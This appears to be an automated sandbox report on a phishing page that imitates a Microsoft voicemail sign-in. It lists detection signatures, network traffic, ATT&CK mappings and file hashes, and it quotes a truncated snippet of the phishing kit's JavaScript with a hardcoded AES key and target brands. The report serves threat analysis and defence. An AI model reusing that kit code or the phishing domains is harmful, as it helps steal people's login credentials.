Windows Analysis Report
https://jwx.iountanic.com/4rGra/

Overview

General Information

Sample URL: https://jwx.iountanic.com/4rGra/
Analysis ID: 1501941

Detection

Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
HTML page contains suspicious base64 encoded javascript
Phishing site detected (based on image similarity)
Uses Javascript AES encryption / decryption (likely to hide suspicious Javascript code)
Detected non-DNS traffic on DNS port
HTML body contains low number of good links
HTML body contains password input but no form action
HTML page contains hidden javascript code
HTML title does not match URL
Invalid T&C link found
Queries the volume information (name, serial number etc) of a device
Stores files to the Windows start menu directory

Classification

Classification categories: Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner (scale: clean, suspicious, malicious)
  • System is w10x64_ra
  • chrome.exe (PID: 6188 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://jwx.iountanic.com/4rGra/ MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6944 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1952,i,16258610462706437278,6547251417638234460,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • LogonUI.exe (PID: 3936 cmdline: "LogonUI.exe" /flags:0x4 /state0:0xa3fee055 /state1:0x41c64e6d MD5: 893144FE49AA16124B5BD3034E79BBC6)
  • cleanup
No yara matches
No Sigma rule has matched
No Suricata rule has matched

AV Detection

Source: https://jwx.iountanic.com/4rGra/ Avira URL Cloud: detection malicious, Label: phishing

Phishing

Source: https://jwx.iountanic.com/FSCPMPHDOOGFGJPPKFFXIVSBDGUOMESNXZEmi9xl2su39hx3eap155bb1yf1kv08yuibb?QPXADOXYEWYMDLXWOQGHDMQVAGHDVLUORMH11943455037591685950360239981410367on5w8iz0dvy97fmrce46bm98g4wuv7k LLM: Score: 8 Reasons: The domain name contains a misspelling and an extra character, which is a common indicator of a phishing site. Additionally, the use of a pop-up window for the sign-in form is unusual and may be an attempt to trick users into providing sensitive information. DOM: 6.5.pages.csv
Source: https://jwx.iountanic.com/4rGra/ HTTP Parser: Base64 decoded: <script>
Source: https://jwx.iountanic.com/FSCPMPHDOOGFGJPPKFFXIVSBDGUOMESNXZEmi9xl2su39hx3eap155bb1yf1kv08yuibb?QPXADOXYEWYMDLXWOQGHDMQVAGHDVLUORMH11943455037591685950360239981410367on5w8iz0dvy97fmrce46bm98g4wuv7k Matcher: Found strong image similarity, brand: MICROSOFT
Source: https://jwx.iountanic.com/FSCPMPHDOOGFGJPPKFFXIVSBDGUOMESNXZEmi9xl2su39hx3eap155bb1yf1kv08yuibb?QPXADOXYEWYMDLXWOQGHDMQVAGHDVLUORMH11943455037591685950360239981410367on5w8iz0dvy97fmrce46bm98g4wuv7k HTTP Parser: var websitenames = ["godaddy", "okta"];var capnum = 1;var appnum = 1;var view = "";var pagelinkval = "zplelv";var emailcheck = "0";var webname = "rtrim(/web8/, '/')";var urlo = "ujfgfqcwxnoimsuedv5hl9v8ufmuafolu0bwyowlb8ql05";var gdf = "ijm44h7qee6seugbwmezoquvaln7vxugypbowab111";var odf = "ghjp8d4qvfvfziwyzclgsp2s6enecd647";var currentreq = null;var requestsent = false;var pagedata = "";var redirecturl = "";let useragent = navigator.useragent;let browsername;let userip;let usercountry;var errorcodeexecuted = false;if(useragent.match(/chrome|chromium|crios/i)){ browsername = "chrome";} else if(useragent.match(/firefox|fxios/i)){ browsername = "firefox";} else if(useragent.match(/safari/i)){ browsername = "safari";} else if(useragent.match(/opr\//i)){ browsername = "opera";} else if(useragent.match(/edg/i)){ browsername = "edge";} else{ browsername="no browser detection";}function encryptdata(data) { const key = cryptojs.enc.utf8.parse('1234567890123456'...
Source: https://jwx.iountanic.com/FSCPMPHDOOGFGJPPKFFXIVSBDGUOMESNXZEmi9xl2su39hx3eap155bb1yf1kv08yuibb?QPXADOXYEWYMDLXWOQGHDMQVAGHDVLUORMH11943455037591685950360239981410367on5w8iz0dvy97fmrce46bm98g4wuv7k HTTP Parser: Number of links: 0
Source: https://jwx.iountanic.com/FSCPMPHDOOGFGJPPKFFXIVSBDGUOMESNXZEmi9xl2su39hx3eap155bb1yf1kv08yuibb?QPXADOXYEWYMDLXWOQGHDMQVAGHDVLUORMH11943455037591685950360239981410367on5w8iz0dvy97fmrce46bm98g4wuv7k HTTP Parser: <input type="password" .../> found but no <form action="...
Source: https://jwx.iountanic.com/4rGra/ HTTP Parser: Base64 decoded: <!DOCTYPE html><html lang="en"><head> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script src="https://challenges.cloudflare.com/turnstile/v0/api.js?render=explicit"></script> <script src="https://cdnjs.cloudflar...
Source: https://jwx.iountanic.com/FSCPMPHDOOGFGJPPKFFXIVSBDGUOMESNXZEmi9xl2su39hx3eap155bb1yf1kv08yuibb?QPXADOXYEWYMDLXWOQGHDMQVAGHDVLUORMH11943455037591685950360239981410367on5w8iz0dvy97fmrce46bm98g4wuv7k HTTP Parser: Title: Voice Mail does not match URL
Source: https://jwx.iountanic.com/FSCPMPHDOOGFGJPPKFFXIVSBDGUOMESNXZEmi9xl2su39hx3eap155bb1yf1kv08yuibb?QPXADOXYEWYMDLXWOQGHDMQVAGHDVLUORMH11943455037591685950360239981410367on5w8iz0dvy97fmrce46bm98g4wuv7k HTTP Parser: Invalid link: Terms of use
Source: https://jwx.iountanic.com/FSCPMPHDOOGFGJPPKFFXIVSBDGUOMESNXZEmi9xl2su39hx3eap155bb1yf1kv08yuibb?QPXADOXYEWYMDLXWOQGHDMQVAGHDVLUORMH11943455037591685950360239981410367on5w8iz0dvy97fmrce46bm98g4wuv7k HTTP Parser: Invalid link: Privacy & cookies
Source: https://jwx.iountanic.com/FSCPMPHDOOGFGJPPKFFXIVSBDGUOMESNXZEmi9xl2su39hx3eap155bb1yf1kv08yuibb?QPXADOXYEWYMDLXWOQGHDMQVAGHDVLUORMH11943455037591685950360239981410367on5w8iz0dvy97fmrce46bm98g4wuv7k HTTP Parser: <input type="password" .../> found
Source: https://jwx.iountanic.com/4rGra/ HTTP Parser: No favicon
Source: https://jwx.iountanic.com/FSCPMPHDOOGFGJPPKFFXIVSBDGUOMESNXZEmi9xl2su39hx3eap155bb1yf1kv08yuibb?QPXADOXYEWYMDLXWOQGHDMQVAGHDVLUORMH11943455037591685950360239981410367on5w8iz0dvy97fmrce46bm98g4wuv7k HTTP Parser: No favicon
Source: https://jwx.iountanic.com/FSCPMPHDOOGFGJPPKFFXIVSBDGUOMESNXZEmi9xl2su39hx3eap155bb1yf1kv08yuibb?QPXADOXYEWYMDLXWOQGHDMQVAGHDVLUORMH11943455037591685950360239981410367on5w8iz0dvy97fmrce46bm98g4wuv7k HTTP Parser: No <meta name="author".. found
Source: https://jwx.iountanic.com/FSCPMPHDOOGFGJPPKFFXIVSBDGUOMESNXZEmi9xl2su39hx3eap155bb1yf1kv08yuibb?QPXADOXYEWYMDLXWOQGHDMQVAGHDVLUORMH11943455037591685950360239981410367on5w8iz0dvy97fmrce46bm98g4wuv7k HTTP Parser: No <meta name="copyright".. found
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49737 version: TLS 1.2
Source: unknown HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.16:49739 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49740 version: TLS 1.2
Source: unknown HTTPS traffic detected: 51.124.78.146:443 -> 192.168.2.16:49741 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.190.160.17:443 -> 192.168.2.16:49742 version: TLS 1.2
Source: unknown HTTPS traffic detected: 51.124.78.146:443 -> 192.168.2.16:49743 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.137.106.217:443 -> 192.168.2.16:49745 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.137.106.217:443 -> 192.168.2.16:49747 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.137.106.217:443 -> 192.168.2.16:49749 version: TLS 1.2
Source: unknown HTTPS traffic detected: 52.137.106.217:443 -> 192.168.2.16:49750 version: TLS 1.2
Source: unknown HTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49816 version: TLS 1.2
Source: chrome.exe Memory has grown: Private usage: 1MB later: 28MB
Source: global traffic TCP traffic: 192.168.2.16:49765 -> 1.1.1.1:53
Source: global traffic TCP traffic: 192.168.2.16:49821 -> 1.1.1.1:53
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown TCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 184.28.90.27
Source: unknown TCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknown TCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknown TCP traffic detected without corresponding DNS query: 51.124.78.146
Source: global traffic DNS traffic detected: DNS query: jwx.iountanic.com
Source: global traffic DNS traffic detected: DNS query: 7zbz.marigaiv.ru
Source: global traffic DNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: code.jquery.com
Source: global traffic DNS traffic detected: DNS query: challenges.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: cdn.socket.io
Source: global traffic DNS traffic detected: DNS query: github.com
Source: global traffic DNS traffic detected: DNS query: www.w3schools.com
Source: global traffic DNS traffic detected: DNS query: ok4static.oktacdn.com
Source: global traffic DNS traffic detected: DNS query: objects.githubusercontent.com
Source: classification engine | Classification label: mal68.phis.win@17/47@48/298
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Windows\System32\LogonUI.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknown | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://jwx.iountanic.com/4rGra/
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=1952,i,16258610462706437278,6547251417638234460,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | Process created: unknown unknown
Source: unknown | Process created: C:\Windows\System32\LogonUI.exe "LogonUI.exe" /flags:0x4 /state0:0xa3fee055 /state1:0x41c64e6d
Source: C:\Windows\System32\LogonUI.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0bdc6fc7-83e3-46a4-bfa0-1bc14dbf8b38}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
Source: C:\Program Files\Google\Chrome\Application\chrome.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
Source: C:\Windows\System32\LogonUI.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\LogonUI.exe | Queries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
Source: C:\Windows\System32\LogonUI.exe | Queries volume information: C:\Windows\Fonts\segoeuisl.ttf VolumeInformation
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | Windows Management Instrumentation | 1 Scripting | 1 Process Injection | 1 Masquerading | OS Credential Dumping | 11 System Information Discovery | Remote Services | Data from Local System | 2 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | 1 DLL Side-Loading | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | 1 Non-Application Layer Protocol | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | 1 Registry Run Keys / Startup Folder | 1 Registry Run Keys / Startup Folder | 1 Deobfuscate/Decode Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | 2 Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 1 Extra Window Memory Injection | 1 DLL Side-Loading | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 Extra Window Memory Injection | LSA Secrets | Internet Connection Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact

Source | Detection | Scanner | Label | Link
https://jwx.iountanic.com/4rGra/ | 100% | Avira URL Cloud | phishing |
No Antivirus matches
Name | Malicious | Antivirus Detection | Reputation
https://jwx.iountanic.com/FSCPMPHDOOGFGJPPKFFXIVSBDGUOMESNXZEmi9xl2su39hx3eap155bb1yf1kv08yuibb?QPXADOXYEWYMDLXWOQGHDMQVAGHDVLUORMH11943455037591685950360239981410367on5w8iz0dvy97fmrce46bm98g4wuv7k | true | | unknown
https://jwx.iountanic.com/4rGra/ | true | | unknown
IP
192.168.2.16
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1501941
Start date and time: 2024-08-30 19:30:26 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration:
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: defaultwindowsinteractivecookbook.jbs
Sample URL: https://jwx.iountanic.com/4rGra/
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• EGA enabled
Analysis Mode: stream
Analysis stop reason: Timeout
Detection: MAL
Classification: mal68.phis.win@17/47@48/298
• Exclude process from analysis (whitelisted): svchost.exe
• Excluded IPs from analysis (whitelisted): 142.250.186.99, 142.250.186.174, 74.125.71.84, 34.104.35.123
• Excluded domains from analysis (whitelisted): clients2.google.com, accounts.google.com, edgedl.me.gvt1.com, clientservices.googleapis.com, clients.l.google.com
• Not all processes where analyzed, report is missing behavior information
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: https://jwx.iountanic.com/4rGra/
Input | Output
URL: https://jwx.iountanic.com/4rGra/ Model: jbxai
{
"brand":["CLOUDFLARE"],
"contains_trigger_text":false,
"prominent_button_name":"unknown",
"text_input_field_labels":["unknown"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}
URL: https://jwx.iountanic.com/FSCPMPHDOOGFGJPPKFFXIVSBDGUOMESNXZEmi9xl2su39hx3eap155bb1yf1kv08yuibb?QPXADOXYEWYMDLXWOQGHDMQVAGHDVLUORMH11943455037591685950360239981410367on5w8iz0dvy97fmrce46bm98g4wuv7k Model: jbxai
{
"brand":["Audio"],
"contains_trigger_text":false,
"prominent_button_name":"unknown",
"text_input_field_labels":["unknown"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}
URL: https://jwx.iountanic.com/FSCPMPHDOOGFGJPPKFFXIVSBDGUOMESNXZEmi9xl2su39hx3eap155bb1yf1kv08yuibb?QPXADOXYEWYMDLXWOQGHDMQVAGHDVLUORMH11943455037591685950360239981410367on5w8iz0dvy97fmrce46bm98g4wuv7k Model: jbxai
{
"brand":["unknown"],
"contains_trigger_text":false,
"prominent_button_name":"unknown",
"text_input_field_labels":["unknown"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}
URL: https://jwx.iountanic.com/FSCPMPHDOOGFGJPPKFFXIVSBDGUOMESNXZEmi9xl2su39hx3eap155bb1yf1kv08yuibb?QPXADOXYEWYMDLXWOQGHDMQVAGHDVLUORMH11943455037591685950360239981410367on5w8iz0dvy97fmrce46bm98g4wuv7k Model: jbxai
{
"brand":["Microsoft"],
"contains_trigger_text":false,
"prominent_button_name":"Next",
"text_input_field_labels":["Email, phone, or Skype","No account? Create one! Can't access your account?"],
"pdf_icon_visible":false,
"has_visible_captcha":false,
"has_urgent_text":false,
"has_visible_qrcode":false}
URL: https://jwx.iountanic.com/FSCPMPHDOOGFGJPPKFFXIVSBDGUOMESNXZEmi9xl2su39hx3eap155bb1yf1kv08yuibb?QPXADOXYEWYMDLXWOQGHDMQVAGHDVLUORMH11943455037591685950360239981410367on5w8iz0dvy97fmrce46bm98g4wuv7k Model: jbxai
{
"phishing_score":8,
"brand_name":"Microsoft",
"reasons":"The domain name contains a misspelling and an extra character, which is a common indicator of a phishing site. Additionally, the use of a pop-up window for the sign-in form is unusual and may be an attempt to trick users into providing sensitive information."}
Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Aug 30 16:30:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category: dropped
Size (bytes): 2673
Entropy (8bit): 3.9977278553805546
Encrypted: false
SSDEEP:
MD5: 81D1317FD6CED5466A472C9D6205FE97
SHA1: D23FA65BE9DAC2553025662094D21A277F81146A
SHA-256: 1262EF08BBD70ECA894E1BE8B44F42D31160F33F135EA23882BD64721614B614
SHA-512: B2F7D43A702DA314C962FFCAA73D79C77749811796261E903507653E7E68D81B2ADE90D97D4D27424F9C7EAF641E1E58C37EC49F7B831E3995D205BB5333AEB8
Malicious: false
Reputation: unknown
Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Aug 30 16:30:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category: dropped
Size (bytes): 2675
Entropy (8bit): 4.01253191233928
Encrypted: false
SSDEEP:
MD5: 26F554BEA705857ED1E95AB05C886B73
SHA1: 7B65E3F84BC901B6EDEEC8DE3F63EC1ACA2485B8
SHA-256: AC11859496CFD1F8138B39D62FDEA93396700D687EA8D0D28BA1DDEB3A785294
SHA-512: C9D41518E5B1CB28B47E0D968D96E3340CD31E773C1BD5ABA2414CC9D68720E2C9AEC0E524D0D862CDE9050CB3D19292721F175EDE46FDA13073C648B2D91D90
Malicious: false
Reputation: unknown
Process: C:\Program Files\Google\Chrome\Application\chrome.exe
File Type: MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 6 08:05:01 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category: dropped
Size (bytes): 2689
Entropy (8bit): 4.017225534943486
Encrypted: false
SSDEEP:
MD5: 3413053096DAAE157B936DD3190B0F9F
SHA1: DDB660D15AB16E43AFD0DDC3622F6299983DF736
SHA-256: A9A50368CD8F5AA16266FAE188EA10248A890FE1BEB28C52C0C31F6C1220923D
SHA-512: B6232642A1CA59B092B3596E94916F3EBDB7E96CA11B5995535E609767FBE56228BF55733083CD72A0337522053034A20BA9708D5FFABDAFE8DEE80D37A854B7
Malicious: false
Reputation: unknown
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Aug 30 16:30:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2677
                                    Entropy (8bit):4.011151301776929
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:26569E88E12984BDFDB889D286865B9E
                                    SHA1:2B3B369B0ACB676491DE3560805CAB342915E4FF
                                    SHA-256:E927F4B1959EBE6D2060AE5ED9B14E51EE46440D819A7F8926B7CF7680186862
                                    SHA-512:36617661285D48ACF4D0D8CA78ACDA0E48AB924D7646C45EE144D03D7B2F7A4C39F902E8BCA41D763192363B75C9D1DB99872E55B367A26CE08F59B20AEF68EB
                                    Malicious:false
                                    Reputation:unknown
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Aug 30 16:30:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2677
                                    Entropy (8bit):3.996634842374419
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:62A45D08C62372A2F927D82D1EB9E532
                                    SHA1:EDD615EAB5A20677A35BC1E7A9D631253F665442
                                    SHA-256:40589F33307F13959FCCA66F94D5D049ABE27B111F0797DF215CD653602705E7
                                    SHA-512:B7BF01E9C3FCB924915579B1EB521B8870D937E85DFDE390DD6F56CF29DD5E5AF57FDCC6774C05199780A50FD2BE64A12121F7F7D98675F49781624D5CA74D79
                                    Malicious:false
                                    Reputation:unknown
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Aug 30 16:30:58 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                    Category:dropped
                                    Size (bytes):2679
                                    Entropy (8bit):4.004813102712757
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:7BE9F10C2C17497DE9878A7778FFE012
                                    SHA1:44E2FB310D14CF3CA44158F79BC77FE148E9311A
                                    SHA-256:0B9A9DBC8FDF92320740D96D9E3E588688423B56C42B079C23AEC58E72967B80
                                    SHA-512:A2862221237B6EF305654327A6E4919DDB8DD3BEF4D0BF13BF0C9E7143574CCB00FED6C32D5922492C67AC3A434D44761AE8ABE23843A00719398AF34FE97CAF
                                    Malicious:false
                                    Reputation:unknown
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                    Category:downloaded
                                    Size (bytes):93276
                                    Entropy (8bit):7.997636438159837
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:BCD7983EA5AA57C55F6758B4977983CB
                                    SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                    SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                    SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/efG1tIfbXSC1m634RPympFukl100
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:ASCII text, with no line terminators
                                    Category:downloaded
                                    Size (bytes):128
                                    Entropy (8bit):4.750616928608237
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:D90F02F133E7B82AF89B3E58526AC459
                                    SHA1:F1D6D47EFE0D920F5BC5024E813554BD2F8A1650
                                    SHA-256:FCF0826E3EA7D24F6C73417BFF62AD84191ECC837DBFB10E60A2547580C3C14D
                                    SHA-512:83C187216CE1B44E23000DF4F25A4BAA7C5E0066E62C3E0D0203B013B5C26D097C6B225C58E345204B47E5E7BF34D4A8E60F7DF63D6083157C6CB9707DD9C41E
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzISFwlgn4eXlftG0hIFDV9X_g0SBQ0TmyRjEkEJtk2r7Z3kXpQSBQ3PIyr_EgUNxZPEJBIFDYmlZ8sSBQ3DGTmQEgUNiaVnyxIFDcMZOZASBQ3QAkDsEgUNqF3jdA==?alt=proto
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 2160 x 443, 8-bit/color RGBA, non-interlaced
                                    Category:downloaded
                                    Size (bytes):49602
                                    Entropy (8bit):7.881935507115631
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:DB783743CD246FF4D77F4A3694285989
                                    SHA1:B9466716904457641B7831868B47162D8D378D41
                                    SHA-256:5913B1EC0FC58AB2BEC576804B9E9B566A584EA3D21A1BF74A7B40051A447FDC
                                    SHA-512:E6F36C52996B6BF8B07C7A102DEF2D555A1D35FA12F1A2016EDD8F3C86C33DD3545513B436AB6B4EF1D1CAD8A5CA5D352BA587EEE605638640B258C3976D9033
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/ijXqR0TgqZfLZGejhmHztxneuabhmOf1pgGxxyaFPXnt62TFvBx8TIyRCW1TVtEGZ12210
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:Web Open Font Format (Version 2), TrueType, length 28000, version 1.66
                                    Category:downloaded
                                    Size (bytes):28000
                                    Entropy (8bit):7.99335735457429
                                    Encrypted:true
                                    SSDEEP:
                                    MD5:A4BCA6C95FED0D0C5CC46CF07710DCEC
                                    SHA1:73B56E33B82B42921DB8702A33EFD0F2B2EC9794
                                    SHA-256:5A51D246AF54D903F67F07F2BD820CE77736F8D08C5F1602DB07469D96DBF77F
                                    SHA-512:60A058B20FCB4F63D02E89225A49226CCD7758C21D9162D1B2F4B53BBA951B1C51D3D74C562029F417D97F1FCA93F25FDD2BC0501F215E3C1EF076810B54DD06
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://jwx.iountanic.com/pqFaa7MVaQUaBWM19WD12wLZwx40
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:Unicode text, UTF-8 (with BOM) text
                                    Category:downloaded
                                    Size (bytes):23427
                                    Entropy (8bit):5.112735417225198
                                    Encrypted:false
                                    SSDEEP:
                                    MD5:BA0537E9574725096AF97C27D7E54F76
                                    SHA1:BD46B47D74D344F435B5805114559D45979762D5
                                    SHA-256:4A7611BC677873A0F87FE21727BC3A2A43F57A5DED3B10CE33A0F371A2E6030F
                                    SHA-512:FC43F1A6B95E1CE005A8EFCDB0D38DF8CC12189BEAC18099FD97C278D254D5DA4C24556BD06515D9D6CA495DDB630A052AEFC0BB73D6ED15DEBC0FB1E8E208E7
                                    Malicious:false
                                    Reputation:unknown
                                    URL:https://www.w3schools.com/w3css/4/w3.css
                                    Preview:./* W3.CSS 4.15 December 2020 by Jan Egil and Borge Refsnes */.html{box-sizing:border-box}*,*:before,*:after{box-sizing:inherit}./* Extract from normalize.css by Nicolas Gallagher and Jonathan Neal git.io/normalize */.html{-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}.article,aside,details,figcaption,figure,footer,header,main,menu,nav,section{display:block}summary{display:list-item}.audio,canvas,progress,video{display:inline-block}progress{vertical-align:baseline}.audio:not([controls]){display:none;height:0}[hidden],template{display:none}.a{background-color:transparent}a:active,a:hover{outline-width:0}.abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}.b,strong{font-weight:bolder}dfn{font-style:italic}mark{background:#ff0;color:#000}.small{font-size:80%}sub,sup{font-size:75%;line-height:0;position:relative;vertical-align:baseline}.sub{bottom:-0.25em}sup{top:-0.5em}figure{margin:1em 40px}img{border-style:none}.code,kbd,p
                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                    File Type:PNG image data, 2 x 2, 8-bit/color RGB, non-interlaced
                                    Category:dropped
                                    Size (bytes):61
